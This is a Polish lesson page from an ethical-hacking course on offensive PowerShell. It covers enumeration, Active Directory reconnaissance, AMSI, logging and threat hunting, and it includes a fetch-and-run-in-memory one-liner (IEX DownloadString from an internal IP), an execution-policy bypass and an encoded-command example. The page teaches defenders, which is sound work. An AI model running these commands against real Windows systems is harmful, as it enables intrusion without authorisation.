PowerShell dla atakujących
Ofensywny PowerShell
PowerShell dla atakujących to bezpłatna lekcja Ethical Hacking Academy na CoddyKit. To lekcja 4 z 4. Możesz przeczytać całą lekcję poniżej za darmo — a potem ćwiczyć ją interaktywnie w przeglądarce z wbudowanym edytorem kodu i tutorem AI dostępnym 24/7. To część ścieżki edukacyjnej Ethical Hacking Academy, a Twój postęp synchronizuje się między webem a aplikacją CoddyKit. Kurs Ethical Hacking Academy zawiera 4 lekcji w sumie.
Dlaczego PowerShell
PowerShell jest wbudowany w system Windows, ściśle zintegrowany z systemem operacyjnym i platformą .NET oraz cieszy się zaufaniem administratorów. Dzięki temu jest ulubionym narzędziem atakujących wykorzystującym living-off-the-land — nie trzeba dostarczać żadnego złośliwego oprogramowania.
Ta lekcja omawia pojęcia związane z ofensywnym PowerShell, które musi Pan rozumieć, aby atakować system Windows i go chronić.
Cmdlety i potok
Polecenia PowerShell to cmdlety w formie Czasownik-Rzeczownik. Przekazują w potoku rozbudowane obiekty, a nie tylko tekst, dzięki czemu enumeracja jest bardzo skuteczna.
Get-Process | Where-Object { $_.CPU -gt 10 } | Select-Object Name, IdEnumeracja systemu
Atakujący używają wbudowanych cmdletów do szybkiego rozpoznania hosta — użytkowników, usług, sieci i zainstalowanych poprawek.
Get-LocalUser
Get-Service | Where-Object Status -eq 'Running'
Get-NetTCPConnection -State ListenZasady wykonywania nie są zabezpieczeniem
Zasady wykonywania ograniczają uruchamianie plików skryptów, ale nie stanowią granicy bezpieczeństwa. Można je obejść wieloma prostymi przełącznikami, dlatego obrońcy nie powinni na nich polegać.
powershell -ExecutionPolicy Bypass -File script.ps1Pobieranie i uruchamianie
Popularna technika polega na pobraniu payloadu i uruchomieniu go w pamięci, dzięki czemu na dysku pozostaje niewiele śladów. Dlatego ważne jest monitorowanie sieci i AMSI.
IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/tool.ps1')Polecenia zakodowane
Przełącznik -EncodedCommand uruchamia polecenia PowerShell zakodowane w Base64. Często wykorzystuje się go do ukrycia zamiaru przed pobieżną analizą i prostymi filtrami.
Obrońcy dekodują je na podstawie dzienników, aby ujawnić, co rzeczywiście zostało uruchomione.
powershell -EncodedCommand <base64-here>Frameworki ofensywne
Dojrzałe zestawy narzędzi bazują na tych podstawowych mechanizmach:
- PowerSploit / PowerView — enumeracja AD i działania po uzyskaniu dostępu.
- Empire / Covenant — command-and-control.
- Nishang — skrypty ofensywne.
Większość z nich jest obecnie dobrze rozpoznawana przez mechanizmy ochrony na podstawie sygnatur.
Rozpoznanie Active Directory
W domenie PowerShell (PowerView lub moduł AD) odwzorowuje użytkowników, grupy i relacje zaufania — stanowi to podstawę do znalezienia ścieżki prowadzącej do uprawnień Domain Admin.
Get-ADUser -Filter * -Properties LastLogonDate
Get-ADGroupMember 'Domain Admins'AMSI i rejestrowanie
Firma Microsoft dodała zabezpieczenia przeznaczone konkretnie do przeciwdziałania nadużyciom PowerShell:
- AMSI (Antimalware Scan Interface) skanuje zawartość skryptów przed ich wykonaniem.
- Script Block Logging rejestruje uruchamiane polecenia.
- Constrained Language Mode ogranicza dostęp do niebezpiecznych funkcji.
Atakujący próbują omijać AMSI, a obrońcy monitorują dzienniki.
Huntowanie zagrożeń
Zespoły blue team wyszukują złośliwe użycie PowerShell, szukając:
- Zakodowanych lub zaciemnionych poleceń.
- Połączeń sieciowych pobierających dane za pomocą
DownloadString/IEX. - Nietypowych procesów nadrzędnych (np. Office uruchamiającego PowerShell).
- Dzienników AMSI i bloków skryptów o identyfikatorze zdarzenia 4104.
Korzystaj z niego etycznie
Techniki te są potężne i bezpośrednio odpowiadają sposobom przeprowadzania rzeczywistych włamań. Należy uruchamiać je wyłącznie we własnym laboratorium lub za wyraźną pisemną zgodą.
Ćwiczenie strony defensywnej — odczytywanie dzienników i wykrywanie alertów AMSI — jest równie wartościowe jak nauka strony ofensywnej.
Szybki test
Oceń zasady wykonywania jako mechanizm kontroli.
Podsumowanie
Poznał Pan ofensywne zastosowania PowerShell:
- Oparte na obiektach cmdlety sprawiają, że enumeracja jest skuteczna i trudna do wykrycia (living-off-the-land).
- Pobieranie i uruchamianie, zakodowane polecenia oraz frameworki, takie jak PowerView i Empire.
- Zasady wykonywania nie są zabezpieczeniem; rzeczywistą ochronę zapewniają AMSI i rejestrowanie bloków skryptów.
- Należy zawsze działać etycznie i poznawać także stronę defensywną.
To kończy kurs Windows Internals.
Ucz się Ethical Hacking Academy dzięki korepetycjom AI — za darmo
Pisz i uruchamiaj kod w przeglądarce, otrzymuj natychmiastową pomoc od korepetytora AI dostępnego 24/7 i kontynuuj naukę w sieci lub w aplikacji.
- Kursy
- 31
- Lekcje
- 111
Często zadawane pytania
Czy lekcja „PowerShell dla atakujących” jest bezpłatna?
Tak — pełny tekst „PowerShell dla atakujących” jest dostępny za darmo tutaj w sieci. Aby ćwiczyć ją interaktywnie (wbudowany edytor kodu i tutor AI dostępny 24/7) i odblokować resztę kursu Ethical Hacking Academy, przejdź na CoddyKit PRO. Kurs Ethical Hacking Academy zawiera 4 lekcji w sumie.
Co nauczysz się w „PowerShell dla atakujących”?
Ofensywny PowerShell Ćwiczysz Ethical Hacking Academy z praktycznym kodem, który uruchamiasz bezpośrednio w przeglądarce, a tutor AI dostępny 24/7 odpowiada na Twoje pytania podczas pracy nad lekcją.
Czy potrzebuję doświadczenia, aby zacząć Ethical Hacking Academy?
Nie wymagamy żadnego doświadczenia. Ethical Hacking Academy w CoddyKit jest strukturyzowany dla początkujących i zaawansowanych użytkowników, więc możesz zacząć tutaj lub od początku i uczyć się w swoim tempie. To lekcja 4 z 4.
Ile czasu zajmuje lekcja „PowerShell dla atakujących”?
Większość lekcji CoddyKit trwa około 5–10 minut. Każda lekcja to mały, interaktywny krok, dzięki czemu robisz systematyczne postępy i zawsze wracasz dokładnie do tego samego miejsca — na webie i w aplikacji.
Czy mogę pisać i uruchamiać kod w tej lekcji Ethical Hacking Academy?
Tak. Każda lekcja Ethical Hacking Academy zawiera wbudowany edytor kodu, więc piszesz i uruchamiasz prawdziwy kod bezpośrednio w przeglądarce i od razu otrzymujesz sprzężenie zwrotne od AI — bez konfiguracji na komputerze.
Wszystkie lekcje w tym kursie
- Architektura Windows
- Rejestr
- Uwierzytelnianie w Windows
- PowerShell dla atakujących